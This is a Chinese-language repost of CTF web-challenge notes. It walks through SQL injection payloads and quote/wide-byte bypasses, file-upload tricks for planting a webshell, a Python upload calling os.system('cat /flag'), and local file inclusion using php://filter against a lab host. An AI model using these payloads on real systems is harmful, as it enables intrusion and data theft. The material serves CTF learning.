CTF解题-web类

这篇具有很好参考价值的文章主要介绍了CTF解题-web类。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

WEB

sql注入

1.题目描述:
ctf中web解题方法,网络安全,web安全
解决方法:

1.使用截断型注入{error}:
	username:admin ' or 1=1 #【单引号注释,#注释】
	password:admin【随便输入,都被截断了】
2.内敛型注入{error}:
	username:sqlk '='
	password:sqlk '='
3.绕过引号进行注入{error}:
	若网站对单引号进行了过滤,可以通过%df ' 进行绕过
4.绕过%进行注入{error}:
	若网站对%进行过滤,则可以通过
	username:\
	password:or 1=1 #
5.使用工具:
	1.sqlmap

	2.brupsuit
6.手动注入,联合查询:
7.查看网页,可以进行注册{success}1.注册一个admin+空格的用户
	2.输入密码
	3.返回登录界面,进行admin+密码登录
	4.得到flag

工具的使用:
ctf中web解题方法,网络安全,web安全
2.题目描述
ctf中web解题方法,网络安全,web安全
解决方法:点击查询

1.sql注入情况:输入 sqlk '=' 出现如上页面;
2.堆叠注入输入:1';show database;#

文件上传

1.题目描述:ctf中web解题方法,网络安全,web安全
解题思路:

1.首先通过修改后缀名称进行上传木马:php3文件上传成功
2.蚁剑进入后门,查找key

2、题目描述【白名单检测】
ctf中web解题方法,网络安全,web安全
解题思路:

1.抓包的方式进行解决【修改后缀名jpg,brupsuit修改后缀名php,进入目录后门】

3.问题描述:
在进行文件上传时,各种绕过方式都实验了一遍,都显示无法绕过;
当上传1.asp;.jpg时,返回错误页面,查看可知存在名app.py的python文件;
ctf中web解题方法,网络安全,web安全
解决方法:

编写python文件【import os换行 os.system('cat /flag') 】
将其后缀名改为网站允许上传的格式;
进行上传,上传成功,进入源码进行检查【Ctrl U】,可得flag:

ctf中web解题方法,网络安全,web安全

文件包含

1.题目描述:查看URL地址,可以发现是一个文件包含的题目:?/
ctf中web解题方法,网络安全,web安全
解决方法:

1.使用浏览器插件hackbar:
	1.首先进行本身包含
	http://f7a58394-a60b-4118-9aa6-0fcbd65eb6c5.node4.buuoj.cn:81/index.php?category=index.php
	包含index.php,发现页面可以载入,但是出不来图片【error】
	2.进行flag包含:
	http://f7a58394-a60b-4118-9aa6-0fcbd65eb6c5.node4.buuoj.cn:81/index.php?category=flag.php
	【error】
	3.使用伪协议进行包含【笔记有】:
	http://f7a58394-a60b-4118-9aa6-0fcbd65eb6c5.node4.buuoj.cn:81/index.php?category=php://filter/convert.base64-		 encode/resource=index
	可以使用base64解析出源码来:
	4.尝试将index换为flag【error】
	5.查看index源码:
	  <?php
				$file = $_GET['category'];
				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>
	6.添加woofers:
	http://f7a58394-a60b-4118-9aa6-0fcbd65eb6c5.node4.buuoj.cn:81/index.php?category=php://filter/convert.base64-encode/resource=woofers/../flag
	7.成功:进行base64解码

错题

1.题目描述:只给了一个页面,源码也什么都没有;
tctf中web解题方法,网络安全,web安全
解决方法:
御剑扫描+bp爆破:扫描出shell.php;然后进入这个页面,输入hack,就可以得到flag;文章来源地址https://www.toymoban.com/news/detail-735588.html

到了这里,关于CTF解题-web类的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包赞助服务器费用

相关文章

  • [CTF/网络安全] 攻防世界 PHP2 解题详析

    [CTF/网络安全] 攻防世界 PHP2 解题详析

    翻译: 你能给这个网站进行身份验证吗? index.php是一个常见的文件名,通常用于Web服务器中的网站根目录下。它是默认的主页文件名,在访问一个网站时,如果没有特别指定页面文件名,则服务器会自动加载index.php文件。 在Web应用程序中,index.php文件通常是网站的入口文件

    2024年02月13日
    浏览(12)
  • [CTF/网络安全] 攻防世界 weak_auth 解题详析

    [CTF/网络安全] 攻防世界 weak_auth 解题详析

    题目描述:小宁写了一个登陆验证页面,随手就设了一个密码。 weak_auth翻译: 弱认证 这个术语通常用来描述一种较弱的安全认证方法或机制,它可能存在安全漏洞,易受到攻击或者被绕过。 在信息安全领域中,弱认证是一种常见的安全威胁。例如,使用简单的密码或者未加

    2024年02月13日
    浏览(8)
  • [CTF/网络安全] 攻防世界 simple_php 解题详析

    [CTF/网络安全] 攻防世界 simple_php 解题详析

    题目描述:小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。 $a=@$_GET[\\\'a\\\']; 从HTTP GET请求参数中获取一个名为a的变量,并将其赋值给变量a。@符号用于禁止错误输出,如果不存在参数a则会将变量a设置为NULL。 $b=@$_GET[\\\'b\\\']; 从HTTP GET请求参数中获取一个名为b的变量,

    2024年02月13日
    浏览(7)
  • [CTF/网络安全] 攻防世界 php_rce 解题详析

    [CTF/网络安全] 攻防世界 php_rce 解题详析

    PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),攻击者通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器

    2024年02月06日
    浏览(12)
  • [CTF/网络安全] 攻防世界 disabled_button 解题详析

    [CTF/网络安全] 攻防世界 disabled_button 解题详析

    题目描述:X老师今天上课讲了前端知识,然后给了大家一个不能按的按钮,小宁惊奇地发现这个按钮按不下去,到底怎么才能按下去呢? 题目提示 前端知识 ,由HTML相关知识可知,该按钮 即input标签 不能提交的原因有以下六种: 没有包含在表单中: input 标签必须包含在表

    2024年02月07日
    浏览(10)
  • [CTF/网络安全] 攻防世界 wife_wife 解题详析

    [CTF/网络安全] 攻防世界 wife_wife 解题详析

    该题涉及Java Script原型链污染:JavaScript 原型链污染讲解 可以看到,后端编程语言为Node.js, 简单来讲,通过 newUser.__proto__ 可以访问到新对象的原型 未污染时: 污染时: 我们以知识点的利用为主,查看源代码: 若isAdmin的属性是true,则它为管理员,否则为普通用户;于是我

    2024年02月06日
    浏览(46)
  • [CTF/网络安全] 攻防世界 view_source 解题详析

    [CTF/网络安全] 攻防世界 view_source 解题详析

    题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 单击鼠标右键,点击查看页面源代码: 使用浏览器菜单:不同的浏览器可能会在不同的位置提供查看页面源代码的选项。 以Firefox为例,打开应用程序菜单即可: 使用快捷键:几乎

    2024年02月13日
    浏览(14)
  • [CTF/网络安全] 攻防世界 command_execution 解题详析

    [CTF/网络安全] 攻防世界 command_execution 解题详析

    题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。 ping 命令是一个常用的网络命令,用于测试两台计算机之间网络连接的连通性。通过向目标计算机发送 ICMP 协议的数据包,并等待目标计算机返回响应数据包来测试网络的可达性,同时

    2024年02月06日
    浏览(11)
  • [CTF/网络安全] 攻防世界 fileinclude 解题详析(php伪协议)

    [CTF/网络安全] 攻防世界 fileinclude 解题详析(php伪协议)

    由于index.php在/var/www/html目录下,而flag.php与index.php同为php文件,故猜想flag.php也在该目录下。 查看页面源代码获取更多信息: 源代码中看到 @include($lan.\\\".php\\\"); ,即此处存在文件包含。 又因为 $lan = $_COOKIE[\\\'language\\\']; 因此解题思路为:利用php伪协议,构造language参数,来读取该目

    2024年02月07日
    浏览(10)
  • 网络安全ctf比赛/学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...

    网络安全ctf比赛/学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...

       对于想学习或者参加CTF比赛的朋友来说,CTF工具、练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助。 CTF在线工具 首先给大家推荐我自己常用的3个CTF在线工具网站,内容齐全,收藏备用。 1、CTF在线工具箱:http://ctf.ssleye.com/    包含CTF比赛

    2023年04月24日
    浏览(8)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包